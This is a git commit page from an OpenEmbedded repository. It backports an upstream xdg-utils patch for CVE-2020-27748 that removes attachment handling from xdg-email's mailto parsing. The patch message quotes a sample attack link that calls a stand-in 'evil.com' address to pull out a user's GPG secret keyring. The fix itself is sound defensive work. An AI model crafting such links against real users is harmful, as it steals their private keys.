aboutsummaryrefslogtreecommitdiffstats
diff options
context:
space:
mode:
authorRichard Purdie <richard.purdie@linuxfoundation.org>2021-09-03 14:24:17 +0100
committerRichard Purdie <richard.purdie@linuxfoundation.org>2021-09-03 15:26:25 +0100
commit87191ed0303f6552865ad1edcacd674c57f2010c (patch)
tree4a799961630518bbeefb41009eb73fc1d3c74316
parentede2e0df7982777212b8c25195d41ce9e57562b5 (diff)
downloadopenembedded-core-contrib-87191ed0303f6552865ad1edcacd674c57f2010c.tar.gz
openembedded-core-contrib-87191ed0303f6552865ad1edcacd674c57f2010c.tar.bz2
openembedded-core-contrib-87191ed0303f6552865ad1edcacd674c57f2010c.zip
xdg-utils: Add fix for CVE-2020-27748
Backport an upstream patch for the CVE. Signed-off-by: Richard Purdie <richard.purdie@linuxfoundation.org>
-rw-r--r--meta/recipes-extended/xdg-utils/xdg-utils/1f199813e0eb0246f63b54e9e154970e609575af.patch58
-rw-r--r--meta/recipes-extended/xdg-utils/xdg-utils_1.1.3.bb1
2 files changed, 59 insertions, 0 deletions
diff --git a/meta/recipes-extended/xdg-utils/xdg-utils/1f199813e0eb0246f63b54e9e154970e609575af.patch b/meta/recipes-extended/xdg-utils/xdg-utils/1f199813e0eb0246f63b54e9e154970e609575af.patch
new file mode 100644
index 0000000000..948b9e22e9
--- /dev/null
+++ b/meta/recipes-extended/xdg-utils/xdg-utils/1f199813e0eb0246f63b54e9e154970e609575af.patch
@@ -0,0 +1,58 @@
+From 1f199813e0eb0246f63b54e9e154970e609575af Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?J=C3=B6rg=20Thalheim?= <joerg@thalheim.io>
+Date: Tue, 18 Aug 2020 16:52:24 +0100
+Subject: [PATCH] xdg-email: remove attachment handling from mailto
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+This allows attacker to extract secrets from users:
+
+mailto:sid@evil.com?attach=/.gnupg/secring.gpg
+
+See also https://bugzilla.mozilla.org/show_bug.cgi?id=1613425
+and https://gitlab.freedesktop.org/xdg/xdg-utils/-/issues/177
+
+Signed-off-by: Jörg Thalheim <joerg@thalheim.io>
+---
+ scripts/xdg-email.in | 7 +------
+ 1 file changed, 1 insertion(+), 6 deletions(-)
+
+Upstream-Status: Backport
+CVE: CVE-2020-27748
+
+diff --git a/scripts/xdg-email.in b/scripts/xdg-email.in
+index 6db58ad..5d2f4f3 100644
+--- a/scripts/xdg-email.in
++++ b/scripts/xdg-email.in
+@@ -32,7 +32,7 @@ _USAGE
+
+ run_thunderbird()
+ {
+- local THUNDERBIRD MAILTO NEWMAILTO TO CC BCC SUBJECT BODY ATTACH
++ local THUNDERBIRD MAILTO NEWMAILTO TO CC BCC SUBJECT BODY
+ THUNDERBIRD="$1"
+ MAILTO=$(echo "$2" | sed 's/^mailto://')
+ echo "$MAILTO" | grep -qs "^?"
+@@ -48,7 +48,6 @@ run_thunderbird()
+ BCC=$(/bin/echo -e $(echo "$MAILTO" | grep '^bcc=' | sed 's/^bcc=//;s/%\(..\)/\\x\1/g' | awk '{ printf "%s,",$0 }'))
+ SUBJECT=$(echo "$MAILTO" | grep '^subject=' | tail -n 1)
+ BODY=$(echo "$MAILTO" | grep '^body=' | tail -n 1)
+- ATTACH=$(/bin/echo -e $(echo "$MAILTO" | grep '^attach=' | sed 's/^attach=//;s/%\(..\)/\\x\1/g' | awk '{ printf "%s,",$0 }' | sed 's/,$//'))
+
+ if [ -z "$TO" ] ; then
+ NEWMAILTO=
+@@ -68,10 +67,6 @@ run_thunderbird()
+ NEWMAILTO="${NEWMAILTO},$BODY"
+ fi
+
+- if [ -n "$ATTACH" ] ; then
+- NEWMAILTO="${NEWMAILTO},attachment='${ATTACH}'"
+- fi
+-
+ NEWMAILTO=$(echo "$NEWMAILTO" | sed 's/^,//')
+ DEBUG 1 "Running $THUNDERBIRD -compose \"$NEWMAILTO\""
+ "$THUNDERBIRD" -compose "$NEWMAILTO"
+--
+GitLab
+
diff --git a/meta/recipes-extended/xdg-utils/xdg-utils_1.1.3.bb b/meta/recipes-extended/xdg-utils/xdg-utils_1.1.3.bb
index 108e7b8c4c..73acf6b744 100644
--- a/meta/recipes-extended/xdg-utils/xdg-utils_1.1.3.bb
+++ b/meta/recipes-extended/xdg-utils/xdg-utils_1.1.3.bb
@@ -20,6 +20,7 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=a5367a90934098d6b05af3b746405014"
SRC_URI = "https://portland.freedesktop.org/download/${BPN}-${PV}.tar.gz \
file://0001-Reinstate-xdg-terminal.patch \
file://0001-Don-t-build-the-in-script-manual.patch \
+ file://1f199813e0eb0246f63b54e9e154970e609575af.patch \
"
SRC_URI[md5sum] = "902042508b626027a3709d105f0b63ff"